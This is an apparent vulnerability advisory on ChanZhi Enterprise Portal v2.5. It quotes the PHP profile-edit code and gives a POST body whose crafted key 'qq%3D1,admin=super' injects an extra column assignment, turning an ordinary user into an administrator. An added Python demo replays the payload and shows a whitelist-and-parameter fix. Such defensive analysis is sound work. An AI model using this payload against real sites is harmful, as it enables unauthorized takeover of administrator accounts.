ChanZhi (蝉知) Enterprise Portal System v2.5 SQL injection to admin privilege escalation - vulnerability warning - Black Bar Security Net

2014-10-03T00:00:00
ID MYHACK58:62201454275
Type myhack58
Reporter Anonymous
Modified 2014-10-03T00:00:00

Description

The problem is in the code path where a user edits their own profile information:

/system/module/user/control.php

public function edit($account = '')
{
    /* In front mode the account is always the logged-in user's own, so an ordinary user can only edit themselves. */
    if(!$account or RUN_MODE == 'front') $account = $this->app->user->account;
    if($this->app->user->account == 'guest') $this->locate(inlink('login'));
    if(!empty($_POST))
    {
        /* The whole POST body is handed to the model. */
        $this->user->update($account);
        /* ... remainder of edit() not shown in the advisory. */
    }
}

Following update() into the model:

/system/module/user/model.php

public function update($account)
{
    /* If the user wants to change his password. */
    if($this->post->password1 != false)
    {
        $this->checkPassword();
        if(dao::isError()) return false;
        $password = $this->createPassword($this->post->password1, $account);
        $this->post->set('password', $password);
    }

    /* fixer filters $_POST by key name: cast three fields to int, default admin to 'no',
       strip a few fixed keys, and drop the 'admin' key unless running in admin mode. */
    $user = fixer::input('post')
        ->cleanInt('imobile, qq, zipcode')
        ->setDefault('admin', 'no')
        ->remove('ip, account, join, visits')
        ->removeIF(RUN_MODE != 'admin', 'admin')
        ->get();

    /* Every key left in $user becomes a column assignment in the UPDATE. */
    return $this->dao->update(TABLE_USER)
        ->data($user, $skip = 'password1,password2')
        ->autoCheck()
        ->batchCheck($this->config->user->require->edit, 'notempty')
        ->check('email', 'email')
        ->check('email', 'unique', "account!='$account'")
        ->checkIF($this->post->gtalk != false, 'gtalk', 'email')
        ->where('account')->eq($account)
        ->exec();
}

The fixer class is fairly long, so its code is not posted here; from the code above you can probably work out what it does.

Ordinary users and administrators live in the same table; the only difference is the admin field.

In short, the posted data is walked with a foreach and each key/value pair is fed into the UPDATE.

Of course the admin key is removed by removeIF, but that filter matches on the exact key name and is trivially bypassed.

Straight to the exploitation.

Register a user, log in, and open the profile edit page:

http://localhost/user-edit.html

Save the form with an intercepting proxy and replace the POST body with the following data:

realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq%3D1,admin=super&gtalk=

The trick is the parameter name qq%3D1,admin. PHP splits each pair on the first '=' and percent-decodes the key, so $_POST receives a key named qq=1,admin with the value super. None of the fixer rules touch it: cleanInt looks for a key named exactly qq, and removeIF only drops a key named exactly admin. The surviving key is then used as a column name in the SET clause, so the UPDATE runs with SET qq=1,admin = 'super' and the account is elevated to administrator.
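The path the payload takes, as an added Python re-creation (this is not the project's PHP and not code from the original advisory): PHP-style parsing of the body keeps the '=' hidden in the key qq%3D1,admin, the fixer-like rules match only exact key names and so never see admin, and a builder that interpolates keys as column names produces SET qq=1,admin = 'super'. The in-memory SQLite user table, its column list, the request body, and the hardened builder are constructed for the example; the hardened builder shows the fix a reviewer would ask for (field names validated against a whitelist and ^\w+$, values bound as parameters).

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample body: the request from the advisory, sent by a logged-in
# ordinary user when saving user-edit.html.
RAW_BODY = ("realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company="
            "&address=&zipcode=&mobile=&phone=&qq%3D1,admin=super&gtalk=")

# Assumed column list of the user table; stands in for TABLE_USER in this example.
PROFILE_COLUMNS = ("realname", "email", "company", "address", "zipcode",
                   "mobile", "phone", "qq", "gtalk")


def parse_post(body):
    """Fill a dict the way PHP fills $_POST: split on '&', split each pair on the
    FIRST '=', then percent-decode key and value.  A '%3D' inside the key therefore
    survives as a literal '=' in the key.  (PHP also rewrites '.' and ' ' in keys
    to '_', which does not matter for this payload.)"""
    post = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        post[unquote_plus(key)] = unquote_plus(value)
    return post


def fixer_like(post, run_mode="front"):
    """Mimic the fixer chain in user/model.php.  Every rule matches on the exact key
    name, so the key 'qq=1,admin' is touched by none of them."""
    data = dict(post)
    for field in ("imobile", "qq", "zipcode"):         # ->cleanInt('imobile, qq, zipcode')
        if field in data:
            data[field] = int(data[field] or 0)
    data.setdefault("admin", "no")                     # ->setDefault('admin', 'no')
    for field in ("ip", "account", "join", "visits"):  # ->remove('ip, account, join, visits')
        data.pop(field, None)
    if run_mode != "admin":                            # ->removeIF(RUN_MODE != 'admin', 'admin')
        data.pop("admin", None)
    for field in ("password1", "password2"):           # ->data($user, 'password1,password2')
        data.pop(field, None)
    return data


def sql_quote(value):
    """Quote a VALUE for the unsafe builder; column names get no such treatment."""
    if isinstance(value, int):
        return str(value)
    return "'" + str(value).replace("'", "''") + "'"


def build_update_unsafe(data, account):
    """Vulnerable pattern: the attacker-controlled array KEY is interpolated into
    the SET clause as a column name; only the value is quoted."""
    assignments = ", ".join(f"{key} = {sql_quote(val)}" for key, val in data.items())
    return f"UPDATE user SET {assignments} WHERE account = {sql_quote(account)}"


def build_update_safe(data, account, allowed=PROFILE_COLUMNS):
    """Hardened pattern: a key must be a plain identifier AND on the column
    whitelist, and every value is bound as a parameter."""
    for key in data:
        if not re.fullmatch(r"\w+", key) or key not in allowed:
            raise ValueError(f"rejected field name {key!r}")
    columns = list(data)
    sql = ("UPDATE user SET " + ", ".join(f'"{c}" = ?' for c in columns)
           + " WHERE account = ?")
    return sql, [data[c] for c in columns] + [account]


def run_demo(account="attacker"):
    """Replay the advisory's body against an in-memory user table.  Returns the
    attacker's admin flag after the vulnerable UPDATE and whether the hardened
    builder rejected the same input."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (account TEXT PRIMARY KEY, "
                 + ", ".join(f"{c} TEXT" for c in PROFILE_COLUMNS)
                 + ", admin TEXT NOT NULL DEFAULT 'no')")
    conn.execute("INSERT INTO user (account) VALUES (?)", (account,))

    data = fixer_like(parse_post(RAW_BODY))
    conn.execute(build_update_unsafe(data, account))
    admin_after = conn.execute("SELECT admin FROM user WHERE account = ?",
                               (account,)).fetchone()[0]
    try:
        build_update_safe(data, account)
        rejected = False
    except ValueError:
        rejected = True
    return admin_after, rejected


if __name__ == "__main__":
    print(build_update_unsafe(fixer_like(parse_post(RAW_BODY)), "attacker"))
    print(run_demo())
```

Running the script prints the generated UPDATE, in which the injected key appears verbatim as qq=1,admin = 'super', and then ('super', True): the vulnerable builder flips the admin column while the hardened builder refuses the same input before any SQL is produced. The same whitelist-plus-identifier check placed in the dao's data() method, before field names reach the SET clause, closes this bypass regardless of what fixer removes.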